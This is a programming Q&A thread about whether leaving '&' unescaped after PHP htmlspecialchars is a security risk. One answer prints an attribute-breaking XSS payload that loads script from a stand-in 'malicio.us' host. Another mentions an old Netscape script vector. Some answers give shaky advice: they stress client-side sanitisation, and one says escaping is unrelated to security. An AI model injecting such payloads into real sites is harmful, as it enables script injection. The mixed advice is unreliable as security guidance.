Reputation: 2984
I'm currently using the following line in one of my projects:
htmlspecialchars($value,ENT_QUOTES,'UTF-8');
Thus it encodes &, ', ", <,> . My question there is (as for some internal coding reasons I'm contemplating it) there any security risk involved with not encoding & ? Thus if using the following line would generate a security risk/leak:
$value=str_replace('&','&',$value);
For <,>,'," it is perfectly clear to me WHY they should be encoded as they could be used for html injection. But & I don't see a reason (nor did I find any special reason there so far).
EDIT:
As database access was mentioned a few times. I'm using doctrine there with parameters,... so the database should be (relatively) save from SQL injections.
The above conversion was solely made to prevent html injections, but currently as most of the data lands in fields created by extJS,... the "&" conversion gets in the way there as in the textfield &
is displayed instead of &
.
Sadly because of an architectural error I can only do the whole htmlspecialchars and str_replace part at one and only one location (if I do it at all). And there I can't differentate. Thus also my question there in regards to the &
.
Upvotes: 4
Views: 1172
Reputation: 17661
There exists a security risk whenever you accept user input and then proceed to evaluate it as an expression, output it back to the web page or inject it directly into a SQL statement. htmlspecialchars
encodes some (not all) characters that could be used for nefarious purposes--such as single quotes and double quotes used in SQL injection attacks. htmlspecialchars
shouldn't be used for input security. You should use sophisticated purpose-built methods for removing, encoding or escaping potentially unsafe characters. There are all kinds of special characters and filter evasion techniques that htmlspecialchars
doesn't account for (e.g., IE6 and US-ASCII). Personally, I prefer to remove any special characters if they're not appropriate input (JavaScript to remove non-alphanumeric input: input = input.replace(/\W/g, '');
).
It is always important to sanitize/escape your user input on the client-side using JavaScript, avoid evaluating user input as expressions, and use prepared statements (e.g., PDO) for SQL actions.
If we could see more of your application, we'd be able to better tell if you have a security issue.
Upvotes: 4
Reputation: 536389
Is there any security risk involved with not encoding
&
?
There is a security risk for anyone still running a Netscape 4-based browser, where &{...}
in attributes is a backdoor method to run JS. Hopefully you don't have any Netscape users today, but who knows how some wacky future browser might parse malformed HTML...
There is a functionality risk in that escaping &
is definitively the right thing for HTML markup and not escaping it can mangle your output. eg. markup=cut©&paste
, output=cut©&paste
.
currently as most of the data lands in fields created by extJS,... the "&" conversion gets in the way there as in the textfield & is displayed instead of &.
That is a different error - you should find and fix that, rather than trying to work around the problem. How are you creating the fields, and getting the data into the code that creates them?
If you are injecting values into JavaScript variables then you need to be JS-escaping them, not HTML-escaping them; the two contexts require different handling. A potential workaround is to hide data in the document HTML content (commonly in data-
attributes) and read it from there in JS.
Upvotes: 2
Reputation: 198324
htmlspecialchars
doesn't have anything to do with security, but with HTML specification that says that those characters are special. For security, there are other kinds of escapes - specifically, the important one is the escaping that happens right before things are inserted into a database, but that's not what htmlspecialchars
is used for.
You would use htmlspecialchars
whenever you want to output HTML text, such as
<div id="here" class='here'> or here </div>
The reason for this is that if the first here
contained a literal quote, you'd get a syntax error in your HTML; same with the second here
and the double quote, or third here
and a less-than symbol. Greater-than symbol is not as dangerous, I think, but is replaced for balance (someone correct me if I'm wrong). Ampersand is replaced so that if someone wanted to display "
, not escaping it would display "
instead. When you properly htmlspecialchars
it, you will get &quot;
in HTML, which will render to the desired "
.
As Blender says, it's so that text looks like you want it to. Nothing to do with security.
EDIT: Or rather, it could do with HTML-security (just occured to me). Say someone replaced the first here
with "><script src="http://malicio.us/code"/><p id="
... If it was properly escaped, nothing happens, it's just that weird piece of text inside the attribute. But if not... Still, nothing to do with SQL security, at least.
Upvotes: 1